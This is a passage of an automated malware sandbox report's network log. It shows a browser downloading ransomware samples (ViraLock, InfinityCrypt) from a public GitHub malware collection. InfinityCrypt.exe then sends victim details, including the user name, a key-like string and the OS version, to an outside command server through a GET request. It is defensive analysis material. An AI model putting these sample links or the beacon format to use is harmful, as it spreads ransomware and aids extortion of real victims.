                          POST https://api.github.com/_private/browser/stats

                          HTTP Response

                          200

                          HTTP Request

                          POST https://api.github.com/_private/browser/stats

                          HTTP Response

                          200
                        • 127.0.0.1:49737
                          firefox.exe
                        • 13.87.96.169:443
                          https://checkappexec.microsoft.com/windows/shell/actions
                          tls, http2
                          2.8kB
                          11.0kB
                          19
                          19

                          HTTP Request

                          POST https://checkappexec.microsoft.com/windows/shell/actions

                          HTTP Response

                          200
                        • 52.109.28.47:443
                          https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
                          tls, http
                          EXCEL.EXE
                          1.7kB
                          8.3kB
                          10
                          11

                          HTTP Request

                          POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

                          HTTP Response

                          200
                        • 35.190.72.216:443
                          https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                          tls, http2
                          firefox.exe
                          2.2kB
                          4.8kB
                          19
                          18

                          HTTP Request

                          GET https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                        • 66.102.1.113:443
                          https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                          tls, http2
                          firefox.exe
                          1.6kB
                          8.8kB
                          17
                          18

                          HTTP Request

                          GET https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                        • 23.200.86.251:80
                          http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip
                          http
                          firefox.exe
                          7.9kB
                          506.9kB
                          165
                          377

                          HTTP Request

                          GET http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

                          HTTP Response

                          200
                        • 172.217.132.199:443
                          https://r2---sn-5hnednss.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1737998809,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-5hnednss&ms=nvh&mt=1737998413&mv=m&mvi=2&pl=25&rmhost=r3---sn-5hnednss.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-5hnekn7d.gvt1.com
                          tls, http
                          firefox.exe
                          257.0kB
                          15.5MB
                          4666
                          11122

                          HTTP Request

                          GET https://r2---sn-5hnednss.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1737998809,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-5hnednss&ms=nvh&mt=1737998413&mv=m&mvi=2&pl=25&rmhost=r3---sn-5hnednss.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-5hnekn7d.gvt1.com

                          HTTP Response

                          200
                        • 20.26.156.215:443
                          https://github.com/Endermanch/MalwareDatabase/contributors_list?count=5&current_repository=MalwareDatabase&items_to_show=5
                          tls, http2
                          firefox.exe
                          4.8kB
                          95.8kB
                          37
                          91

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/raw/refs/heads/master/ransomwares/ViraLock.zip

                          HTTP Response

                          302

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/tree/master

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/latest-commit/master

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/tree-commit-info/master

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/branch-and-tag-count

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=master

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/used_by_list

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/contributors_list?count=5&current_repository=MalwareDatabase&items_to_show=5

                          HTTP Response

                          304

                          HTTP Response

                          200

                          HTTP Response

                          204

                          HTTP Response

                          304

                          HTTP Response

                          200

                          HTTP Response

                          304
                        • 185.199.111.133:443
                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/refs/heads/master/ransomwares/InfinityCrypt.zip
                          tls, http2
                          firefox.exe
                          7.5kB
                          182.3kB
                          108
                          150

                          HTTP Request

                          GET https://raw.githubusercontent.com/Endermanch/MalwareDatabase/refs/heads/master/ransomwares/ViraLock.zip

                          HTTP Response

                          200

                          HTTP Request

                          GET https://raw.githubusercontent.com/Endermanch/MalwareDatabase/refs/heads/master/ransomwares/InfinityCrypt.zip

                          HTTP Response

                          200
                        • 20.26.156.210:443
                          https://api.github.com/_private/browser/stats
                          tls, http2
                          firefox.exe
                          3.1kB
                          5.4kB
                          17
                          16

                          HTTP Request

                          POST https://api.github.com/_private/browser/stats

                          HTTP Response

                          200
                        • 20.26.156.215:443
                          https://github.com/Endermanch/MalwareDatabase/raw/refs/heads/master/ransomwares/InfinityCrypt.zip
                          tls, http2
                          firefox.exe
                          6.3kB
                          153.2kB
                          54
                          149

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/ViraLock.zip

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares/ViraLock.zip

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/ViraLock.zip

                          HTTP Response

                          200

                          HTTP Response

                          304

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/tree-commit-info/master/ransomwares

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares

                          HTTP Response

                          304

                          HTTP Response

                          304

                          HTTP Response

                          304

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares/InfinityCrypt.zip

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/InfinityCrypt.zip

                          HTTP Response

                          200

                          HTTP Response

                          200

                          HTTP Request

                          GET https://github.com/Endermanch/MalwareDatabase/raw/refs/heads/master/ransomwares/InfinityCrypt.zip

                          HTTP Response

                          302
                        • 20.26.156.210:443
                          https://api.github.com/_private/browser/stats
                          tls, http2
                          firefox.exe
                          5.0kB
                          7.8kB
                          24
                          24

                          HTTP Request

                          POST https://api.github.com/_private/browser/stats

                          HTTP Response

                          200

                          HTTP Request

                          POST https://api.github.com/_private/browser/stats

                          HTTP Response

                          200

                          HTTP Request

                          POST https://api.github.com/_private/browser/stats

                          HTTP Response

                          200
                        • 162.55.0.137:80
                          http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7CqEzQ2xXx1OPDxXx2dm7xXxmhgPxXxRDmyxXxO24ZxXx%7CMicrosoft%20Windows%2010%20Enterprise%20LTSC%7C0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD%7C3418
                          http
                          Endermanch@InfinityCrypt.exe
                          849 B
                          7.9kB
                          7
                          9

                          HTTP Request

                          GET http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7CqEzQ2xXx1OPDxXx2dm7xXxmhgPxXxRDmyxXxO24ZxXx%7CMicrosoft%20Windows%2010%20Enterprise%20LTSC%7C0252956D83D09E2DE81BF297062EB1A7D9F21F6A1AA73D2F609609407B109BCD%7C3418

                          HTTP Response

                          403
                        • 8.8.8.8:53
                          8.8.8.8.in-addr.arpa
                          dns
                          66 B
                          90 B
                          1
                          1

                          DNS Request

                          8.8.8.8.in-addr.arpa

                        • 8.8.8.8:53
                          github.com
                          dns
                          firefox.exe
                          56 B
                          72 B
                          1
                          1

                          DNS Request

                          github.com

                          DNS Response

                          20.26.156.215

                        • 8.8.8.8:53
                          spocs.getpocket.com
                          dns
                          firefox.exe
                          65 B
                          131 B
                          1
                          1

                          DNS Request

                          spocs.getpocket.com

                          DNS Response

                          34.117.188.166

                        • 8.8.8.8:53
                          firefox-api-proxy.cdn.mozilla.net
                          dns
                          firefox.exe
                          79 B
                          160 B
                          1
                          1

                          DNS Request

                          firefox-api-proxy.cdn.mozilla.net

                          DNS Response

                          34.149.97.1

                        • 8.8.8.8:53
                          github.com
                          dns
                          firefox.exe
                          56 B
                          72 B
                          1
                          1

                          DNS Request

                          github.com

                          DNS Response

                          20.26.156.215

                        • 34.149.97.1:443
                          firefox-api-proxy.cdn.mozilla.net
                          https
                          firefox.exe
                          2.4kB
                          14.5kB
                          12
                          18
                        • 8.8.8.8:53
                          shavar.prod.mozaws.net
                          dns
                          firefox.exe
                          68 B
                          116 B
                          1
                          1

                          DNS Request

                          shavar.prod.mozaws.net

                          DNS Response

                          35.80.96.249
                          54.148.39.91
                          52.11.251.64

                        • 8.8.8.8:53
                          firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                          dns
                          firefox.exe
                          100 B
                          116 B
                          1
                          1

                          DNS Request

                          firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                          DNS Response

                          34.149.97.1

                        • 8.8.8.8:53
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          103 B
                          119 B
                          1
                          1

                          DNS Request

                          prod.content-signature-chains.prod.webservices.mozgcp.net

                          DNS Response

                          34.160.144.191

                        • 8.8.8.8:53
                          prod.ads.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          82 B
                          98 B
                          1
                          1

                          DNS Request

                          prod.ads.prod.webservices.mozgcp.net

                          DNS Response

                          34.117.188.166

                        • 8.8.8.8:53
                          prod.remote-settings.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          94 B
                          110 B
                          1
                          1

                          DNS Request

                          prod.remote-settings.prod.webservices.mozgcp.net

                          DNS Response

                          34.149.100.209

                        • 8.8.8.8:53
                          github.com
                          dns
                          firefox.exe
                          56 B
                          121 B
                          1
                          1

                          DNS Request

                          github.com

                        • 8.8.8.8:53
                          firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                          dns
                          firefox.exe
                          100 B
                          128 B
                          1
                          1

                          DNS Request

                          firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                          DNS Response

                          2600:1901:0:74e4::

                        • 8.8.8.8:53
                          shavar.prod.mozaws.net
                          dns
                          firefox.exe
                          68 B
                          153 B
                          1
                          1

                          DNS Request

                          shavar.prod.mozaws.net

                        • 8.8.8.8:53
                          prod.ads.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          82 B
                          175 B
                          1
                          1

                          DNS Request

                          prod.ads.prod.webservices.mozgcp.net

                        • 8.8.8.8:53
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          103 B
                          131 B
                          1
                          1

                          DNS Request

                          prod.content-signature-chains.prod.webservices.mozgcp.net

                          DNS Response

                          2600:1901:0:92a9::

                        • 8.8.8.8:53
                          prod.remote-settings.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          94 B
                          187 B
                          1
                          1

                          DNS Request

                          prod.remote-settings.prod.webservices.mozgcp.net

                        • 8.8.8.8:53
                          209.205.72.20.in-addr.arpa
                          dns
                          72 B
                          158 B
                          1
                          1

                          DNS Request

                          209.205.72.20.in-addr.arpa

                        • 8.8.8.8:53
                          172.214.232.199.in-addr.arpa
                          dns
                          74 B
                          128 B
                          1
                          1

                          DNS Request

                          172.214.232.199.in-addr.arpa

                        • 8.8.8.8:53
                          215.156.26.20.in-addr.arpa
                          dns
                          72 B
                          158 B
                          1
                          1

                          DNS Request

                          215.156.26.20.in-addr.arpa

                        • 8.8.8.8:53
                          github.githubassets.com
                          dns
                          firefox.exe
                          69 B
                          133 B
                          1
                          1

                          DNS Request

                          github.githubassets.com

                          DNS Response

                          185.199.110.154
                          185.199.109.154
                          185.199.108.154
                          185.199.111.154

                        • 8.8.8.8:53
                          github.githubassets.com
                          dns
                          firefox.exe
                          69 B
                          133 B
                          1
                          1

                          DNS Request

                          github.githubassets.com

                          DNS Response

                          185.199.109.154
                          185.199.110.154
                          185.199.108.154
                          185.199.111.154

                        • 8.8.8.8:53
                          avatars.githubusercontent.com
                          dns
                          firefox.exe
                          75 B
                          139 B
                          1
                          1

                          DNS Request

                          avatars.githubusercontent.com

                          DNS Response

                          185.199.108.133
                          185.199.109.133
                          185.199.110.133
                          185.199.111.133

                        • 8.8.8.8:53
                          github.githubassets.com
                          dns
                          firefox.exe
                          69 B
                          134 B
                          1
                          1

                          DNS Request

                          github.githubassets.com

                        • 8.8.8.8:53
                          avatars.githubusercontent.com
                          dns
                          firefox.exe
                          75 B
                          139 B
                          1
                          1

                          DNS Request

                          avatars.githubusercontent.com

                          DNS Response

                          185.199.108.133
                          185.199.110.133
                          185.199.111.133
                          185.199.109.133

                        • 8.8.8.8:53
                          avatars.githubusercontent.com
                          dns
                          firefox.exe
                          75 B
                          187 B
                          1
                          1

                          DNS Request

                          avatars.githubusercontent.com

                          DNS Response

                          2606:50c0:8003::154
                          2606:50c0:8001::154
                          2606:50c0:8002::154
                          2606:50c0:8000::154

                        • 8.8.8.8:53
                          64.251.11.52.in-addr.arpa
                          dns
                          71 B
                          133 B
                          1
                          1

                          DNS Request

                          64.251.11.52.in-addr.arpa

                        • 8.8.8.8:53
                          154.110.199.185.in-addr.arpa
                          dns
                          74 B
                          118 B
                          1
                          1

                          DNS Request

                          154.110.199.185.in-addr.arpa

                        • 8.8.8.8:53
                          133.108.199.185.in-addr.arpa
                          dns
                          74 B
                          118 B
                          1
                          1

                          DNS Request

                          133.108.199.185.in-addr.arpa

                        • 8.8.8.8:53
                          68.159.190.20.in-addr.arpa
                          dns
                          72 B
                          158 B
                          1
                          1

                          DNS Request

                          68.159.190.20.in-addr.arpa

                        • 8.8.8.8:53
                          private-user-images.githubusercontent.com
                          dns
                          firefox.exe
                          87 B
                          151 B
                          1
                          1

                          DNS Request

                          private-user-images.githubusercontent.com

                          DNS Response

                          185.199.109.133
                          185.199.110.133
                          185.199.111.133
                          185.199.108.133

                        • 8.8.8.8:53
                          private-user-images.githubusercontent.com
                          dns
                          firefox.exe
                          174 B
                          151 B
                          2
                          1

                          DNS Request

                          private-user-images.githubusercontent.com

                          DNS Request

                          private-user-images.githubusercontent.com

                          DNS Response

                          185.199.109.133
                          185.199.110.133
                          185.199.111.133
                          185.199.108.133

                        • 8.8.8.8:53
                          184.115.23.2.in-addr.arpa
                          dns
                          71 B
                          135 B
                          1
                          1

                          DNS Request

                          184.115.23.2.in-addr.arpa

                        • 8.8.8.8:53
                          133.109.199.185.in-addr.arpa
                          dns
                          74 B
                          118 B
                          1
                          1

                          DNS Request

                          133.109.199.185.in-addr.arpa

                        • 8.8.8.8:53
                          collector.github.com
                          dns
                          firefox.exe
                          66 B
                          115 B
                          1
                          1

                          DNS Request

                          collector.github.com

                          DNS Response

                          140.82.113.21

                        • 8.8.8.8:53
                          glb-db52c2cf8be544.github.com
                          dns
                          firefox.exe
                          75 B
                          91 B
                          1
                          1

                          DNS Request

                          glb-db52c2cf8be544.github.com

                          DNS Response

                          140.82.114.21

                        • 8.8.8.8:53
                          glb-db52c2cf8be544.github.com
                          dns
                          firefox.exe
                          75 B
                          140 B
                          1
                          1

                          DNS Request

                          glb-db52c2cf8be544.github.com

                        • 8.8.8.8:53
                          private-user-images.githubusercontent.com
                          dns
                          firefox.exe
                          87 B
                          169 B
                          1
                          1

                          DNS Request

                          private-user-images.githubusercontent.com

                        • 8.8.8.8:53
                          api.github.com
                          dns
                          firefox.exe
                          60 B
                          76 B
                          1
                          1

                          DNS Request

                          api.github.com

                          DNS Response

                          20.26.156.210

                        • 8.8.8.8:53
                          api.github.com
                          dns
                          firefox.exe
                          120 B
                          152 B
                          2
                          2

                          DNS Request

                          api.github.com

                          DNS Response

                          20.26.156.210

                          DNS Request

                          api.github.com

                          DNS Response

                          20.26.156.210

                        • 8.8.8.8:53
                          api.github.com
                          dns
                          firefox.exe
                          60 B
                          125 B
                          1
                          1

                          DNS Request

                          api.github.com

                        • 8.8.8.8:53
                          21.113.82.140.in-addr.arpa
                          dns
                          72 B
                          117 B
                          1
                          1

                          DNS Request

                          21.113.82.140.in-addr.arpa

                        • 8.8.8.8:53
                          210.156.26.20.in-addr.arpa
                          dns
                          72 B
                          158 B
                          1
                          1

                          DNS Request

                          210.156.26.20.in-addr.arpa

                        • 8.8.8.8:53
                          checkappexec.microsoft.com
                          dns
                          144 B
                          384 B
                          2
                          2

                          DNS Request

                          checkappexec.microsoft.com

                          DNS Response

                          13.87.96.169

                          DNS Request

                          checkappexec.microsoft.com

                          DNS Response

                          172.165.61.93

                        • 8.8.8.8:53
                          169.96.87.13.in-addr.arpa
                          dns
                          142 B
                          290 B
                          2
                          2

                          DNS Request

                          169.96.87.13.in-addr.arpa

                          DNS Request

                          169.96.87.13.in-addr.arpa

                        • 8.8.8.8:53
                          roaming.officeapps.live.com
                          dns
                          EXCEL.EXE
                          73 B
                          244 B
                          1
                          1

                          DNS Request

                          roaming.officeapps.live.com

                          DNS Response

                          52.109.28.47

                        • 8.8.8.8:53
                          46.28.109.52.in-addr.arpa
                          dns
                          71 B
                          145 B
                          1
                          1

                          DNS Request

                          46.28.109.52.in-addr.arpa

                        • 8.8.8.8:53
                          47.28.109.52.in-addr.arpa
                          dns
                          71 B
                          145 B
                          1
                          1

                          DNS Request

                          47.28.109.52.in-addr.arpa

                        • 8.8.8.8:53
                          14.173.189.20.in-addr.arpa
                          dns
                          144 B
                          158 B
                          2
                          1

                          DNS Request

                          14.173.189.20.in-addr.arpa

                          DNS Request

                          14.173.189.20.in-addr.arpa

                        • 8.8.8.8:53
                          github.com
                          dns
                          firefox.exe
                          56 B
                          72 B
                          1
                          1

                          DNS Request

                          github.com

                          DNS Response

                          20.26.156.215

                        • 8.8.8.8:53
                          github.com
                          dns
                          firefox.exe
                          56 B
                          72 B
                          1
                          1

                          DNS Request

                          github.com

                          DNS Response

                          20.26.156.215

                        • 8.8.8.8:53
                          github.com
                          dns
                          firefox.exe
                          56 B
                          140 B
                          1
                          1

                          DNS Request

                          github.com

                        • 8.8.8.8:53
                          glb-db52c2cf8be544.github.com
                          dns
                          firefox.exe
                          75 B
                          91 B
                          1
                          1

                          DNS Request

                          glb-db52c2cf8be544.github.com

                          DNS Response

                          140.82.113.22

                        • 8.8.8.8:53
                          glb-db52c2cf8be544.github.com
                          dns
                          firefox.exe
                          75 B
                          140 B
                          1
                          1

                          DNS Request

                          glb-db52c2cf8be544.github.com

                        • 8.8.8.8:53
                          location.services.mozilla.com
                          dns
                          firefox.exe
                          75 B
                          153 B
                          1
                          1

                          DNS Request

                          location.services.mozilla.com

                          DNS Response

                          35.190.72.216

                        • 8.8.8.8:53
                          prod.classify-client.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          188 B
                          110 B
                          2
                          1

                          DNS Request

                          prod.classify-client.prod.webservices.mozgcp.net

                          DNS Request

                          prod.classify-client.prod.webservices.mozgcp.net

                          DNS Response

                          35.190.72.216

                        • 35.190.72.216:443
                          prod.classify-client.prod.webservices.mozgcp.net
                          https
                          firefox.exe
                          3.1kB
                          4.3kB
                          6
                          6
                        • 8.8.8.8:53
                          prod.balrog.prod.cloudops.mozgcp.net
                          dns
                          firefox.exe
                          82 B
                          175 B
                          1
                          1

                          DNS Request

                          prod.balrog.prod.cloudops.mozgcp.net

                        • 8.8.8.8:53
                          prod.classify-client.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          94 B
                          187 B
                          1
                          1

                          DNS Request

                          prod.classify-client.prod.webservices.mozgcp.net

                        • 8.8.8.8:53
                          prod.content-signature-chains.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          103 B
                          131 B
                          1
                          1

                          DNS Request

                          prod.content-signature-chains.prod.webservices.mozgcp.net

                          DNS Response

                          2600:1901:0:92a9::

                        • 8.8.8.8:53
                          redirector.gvt1.com
                          dns
                          firefox.exe
                          130 B
                          322 B
                          2
                          2

                          DNS Request

                          redirector.gvt1.com

                          DNS Request

                          redirector.gvt1.com

                          DNS Response

                          66.102.1.113
                          66.102.1.138
                          66.102.1.101
                          66.102.1.102
                          66.102.1.139
                          66.102.1.100

                          DNS Response

                          66.102.1.138
                          66.102.1.102
                          66.102.1.139
                          66.102.1.101
                          66.102.1.100
                          66.102.1.113

                        • 8.8.8.8:53
                          ciscobinary.openh264.org
                          dns
                          firefox.exe
                          70 B
                          286 B
                          1
                          1

                          DNS Request

                          ciscobinary.openh264.org

                          DNS Response

                          23.200.86.251
                          23.200.87.12

                        • 8.8.8.8:53
                          redirector.gvt1.com
                          dns
                          firefox.exe
                          130 B
                          322 B
                          2
                          2

                          DNS Request

                          redirector.gvt1.com

                          DNS Request

                          redirector.gvt1.com

                          DNS Response

                          66.102.1.139
                          66.102.1.102
                          66.102.1.113
                          66.102.1.100
                          66.102.1.138
                          66.102.1.101

                          DNS Response

                          66.102.1.113
                          66.102.1.102
                          66.102.1.100
                          66.102.1.139
                          66.102.1.101
                          66.102.1.138

                        • 8.8.8.8:53
                          a19.dscg10.akamai.net
                          dns
                          firefox.exe
                          67 B
                          99 B
                          1
                          1

                          DNS Request

                          a19.dscg10.akamai.net

                          DNS Response

                          23.200.87.12
                          23.200.86.251

                        • 8.8.8.8:53
                          a19.dscg10.akamai.net
                          dns
                          firefox.exe
                          67 B
                          123 B
                          1
                          1

                          DNS Request

                          a19.dscg10.akamai.net

                          DNS Response

                          2a02:26f0:a1::58dd:869b
                          2a02:26f0:a1::58dd:86d1

                        • 8.8.8.8:53
                          redirector.gvt1.com
                          dns
                          firefox.exe
                          65 B
                          177 B
                          1
                          1

                          DNS Request

                          redirector.gvt1.com

                          DNS Response

                          2a00:1450:400c:c06::8a
                          2a00:1450:400c:c06::65
                          2a00:1450:400c:c06::8b
                          2a00:1450:400c:c06::71

                        • 66.102.1.113:443
                          redirector.gvt1.com
                          https
                          firefox.exe
                          1.9kB
                          9.3kB
                          7
                          10
                        • 8.8.8.8:53
                          r2---sn-5hnednss.gvt1.com
                          dns
                          firefox.exe
                          71 B
                          116 B
                          1
                          1

                          DNS Request

                          r2---sn-5hnednss.gvt1.com

                          DNS Response

                          172.217.132.199

                        • 8.8.8.8:53
                          r2.sn-5hnednss.gvt1.com
                          dns
                          firefox.exe
                          138 B
                          170 B
                          2
                          2

                          DNS Request

                          r2.sn-5hnednss.gvt1.com

                          DNS Request

                          r2.sn-5hnednss.gvt1.com

                          DNS Response

                          172.217.132.199

                          DNS Response

                          172.217.132.199

                        • 8.8.8.8:53
                          r2.sn-5hnednss.gvt1.com
                          dns
                          firefox.exe
                          69 B
                          97 B
                          1
                          1

                          DNS Request

                          r2.sn-5hnednss.gvt1.com

                          DNS Response

                          2a00:1450:400e:1b::7

                        • 8.8.8.8:53
                          216.72.190.35.in-addr.arpa
                          dns
                          144 B
                          248 B
                          2
                          2

                          DNS Request

                          216.72.190.35.in-addr.arpa

                          DNS Request

                          216.72.190.35.in-addr.arpa

                        • 8.8.8.8:53
                          201.181.244.35.in-addr.arpa
                          dns
                          73 B
                          126 B
                          1
                          1

                          DNS Request

                          201.181.244.35.in-addr.arpa

                        • 8.8.8.8:53
                          113.1.102.66.in-addr.arpa
                          dns
                          71 B
                          105 B
                          1
                          1

                          DNS Request

                          113.1.102.66.in-addr.arpa

                        • 8.8.8.8:53
                          251.86.200.23.in-addr.arpa
                          dns
                          72 B
                          137 B
                          1
                          1

                          DNS Request

                          251.86.200.23.in-addr.arpa

                        • 8.8.8.8:53
                          56.163.245.4.in-addr.arpa
                          dns
                          71 B
                          157 B
                          1
                          1

                          DNS Request

                          56.163.245.4.in-addr.arpa

                        • 8.8.8.8:53
                          199.132.217.172.in-addr.arpa
                          dns
                          74 B
                          112 B
                          1
                          1

                          DNS Request

                          199.132.217.172.in-addr.arpa

                        • 172.217.132.199:443
                          r2.sn-5hnednss.gvt1.com
                          https
                          firefox.exe
                          1.7kB
                          5.9kB
                          5
                          7
                        • 8.8.8.8:53
                          15.164.165.52.in-addr.arpa
                          dns
                          144 B
                          146 B
                          2
                          1

                          DNS Request

                          15.164.165.52.in-addr.arpa

                          DNS Request

                          15.164.165.52.in-addr.arpa

                        • 8.8.8.8:53
                          github.com
                          dns
                          firefox.exe
                          56 B
                          72 B
                          1
                          1

                          DNS Request

                          github.com

                          DNS Response

                          20.26.156.215

                        • 8.8.8.8:53
                          github.com
                          dns
                          firefox.exe
                          112 B
                          121 B
                          2
                          1

                          DNS Request

                          github.com

                          DNS Request

                          github.com

                        • 8.8.8.8:53
                          raw.githubusercontent.com
                          dns
                          firefox.exe
                          71 B
                          135 B
                          1
                          1

                          DNS Request

                          raw.githubusercontent.com

                          DNS Response

                          185.199.111.133
                          185.199.109.133
                          185.199.110.133
                          185.199.108.133

                        • 8.8.8.8:53
                          raw.githubusercontent.com
                          dns
                          firefox.exe
                          71 B
                          135 B
                          1
                          1

                          DNS Request

                          raw.githubusercontent.com

                          DNS Response

                          185.199.109.133
                          185.199.111.133
                          185.199.108.133
                          185.199.110.133

                        • 8.8.8.8:53
                          raw.githubusercontent.com
                          dns
                          firefox.exe
                          142 B
                          366 B
                          2
                          2

                          DNS Request

                          raw.githubusercontent.com

                          DNS Request

                          raw.githubusercontent.com

                          DNS Response

                          2606:50c0:8000::154
                          2606:50c0:8002::154
                          2606:50c0:8001::154
                          2606:50c0:8003::154

                          DNS Response

                          2606:50c0:8001::154
                          2606:50c0:8002::154
                          2606:50c0:8003::154
                          2606:50c0:8000::154

                        • 8.8.8.8:53
                          133.111.199.185.in-addr.arpa
                          dns
                          74 B
                          118 B
                          1
                          1

                          DNS Request

                          133.111.199.185.in-addr.arpa

                        • 8.8.8.8:53
                          support.mozilla.org
                          dns
                          firefox.exe
                          130 B
                          310 B
                          2
                          2

                          DNS Request

                          support.mozilla.org

                          DNS Request

                          support.mozilla.org

                          DNS Response

                          34.149.128.2

                          DNS Response

                          34.149.128.2

                        • 8.8.8.8:53
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          92 B
                          108 B
                          1
                          1

                          DNS Request

                          us-west1.prod.sumo.prod.webservices.mozgcp.net

                          DNS Response

                          34.149.128.2

                        • 8.8.8.8:53
                          us-west1.prod.sumo.prod.webservices.mozgcp.net
                          dns
                          firefox.exe
                          184 B
                          370 B
                          2
                          2

                          DNS Request

                          us-west1.prod.sumo.prod.webservices.mozgcp.net

                          DNS Request

                          us-west1.prod.sumo.prod.webservices.mozgcp.net

                        • 8.8.8.8:53
                          29.243.111.52.in-addr.arpa
                          dns
                          144 B
                          316 B
                          2
                          2

                          DNS Request

                          29.243.111.52.in-addr.arpa

                          DNS Request

                          29.243.111.52.in-addr.arpa

                        • 8.8.8.8:53
                          github.com
                          dns
                          firefox.exe
                          112 B
                          144 B
                          2
                          2

                          DNS Request

                          github.com

                          DNS Request

                          github.com

                          DNS Response

                          20.26.156.215

                          DNS Response

                          20.26.156.215

                        • 8.8.8.8:53
                          github.com
                          dns
                          firefox.exe
                          112 B
                          144 B
                          2
                          2

                          DNS Request

                          github.com

                          DNS Request

                          github.com

                          DNS Response

                          20.26.156.215

                          DNS Response

                          20.26.156.215

                        • 8.8.8.8:53
                          github.com
                          dns
                          firefox.exe
                          112 B
                          140 B
                          2
                          1

                          DNS Request

                          github.com

                          DNS Request

                          github.com

                        • 8.8.8.8:53
                          github.githubassets.com
                          dns
                          firefox.exe
                          69 B
                          133 B
                          1
                          1

                          DNS Request

                          github.githubassets.com

                          DNS Response

                          185.199.108.154
                          185.199.111.154
                          185.199.110.154
                          185.199.109.154

                        • 8.8.8.8:53
                          github.githubassets.com
                          dns
                          firefox.exe
                          138 B
                          285 B
                          2
                          2

                          DNS Request

                          github.githubassets.com

                          DNS Request

                          github.githubassets.com

                        • 8.8.8.8:53
                          collector.github.com
                          dns
                          firefox.exe
                          132 B
                          230 B
                          2
                          2

                          DNS Request

                          collector.github.com

                          DNS Response

                          140.82.113.21

                          DNS Request

                          collector.github.com

                          DNS Response

                          140.82.112.21

                        • 8.8.8.8:53
                          glb-db52c2cf8be544.github.com
                          dns
                          firefox.exe
                          150 B
                          182 B
                          2
                          2

                          DNS Request

                          glb-db52c2cf8be544.github.com

                          DNS Response

                          140.82.112.21

                          DNS Request

                          glb-db52c2cf8be544.github.com

                          DNS Response

                          140.82.112.21

                        • 8.8.8.8:53
                          glb-db52c2cf8be544.github.com
                          dns
                          firefox.exe
                          75 B
                          140 B
                          1
                          1

                          DNS Request

                          glb-db52c2cf8be544.github.com

                        • 8.8.8.8:53
                          api.github.com
                          dns
                          firefox.exe
                          120 B
                          152 B
                          2
                          2

                          DNS Request

                          api.github.com

                          DNS Request

                          api.github.com

                          DNS Response

                          20.26.156.210

                          DNS Response

                          20.26.156.210

                        • 8.8.8.8:53
                          api.github.com
                          dns
                          firefox.exe
                          120 B
                          250 B
                          2
                          2

                          DNS Request

                          api.github.com

                          DNS Request

                          api.github.com

                        • 8.8.8.8:53
                          github.com
                          dns
                          firefox.exe
                          112 B
                          144 B
                          2
                          2

                          DNS Request

                          github.com

                          DNS Request

                          github.com

                          DNS Response

                          20.26.156.215

                          DNS Response

                          20.26.156.215

                        • 8.8.8.8:53
                          github.com
                          dns
                          firefox.exe
                          112 B
                          242 B
                          2
                          2

                          DNS Request

                          github.com

                          DNS Request

                          github.com

                        • 8.8.8.8:53
                          collector.github.com
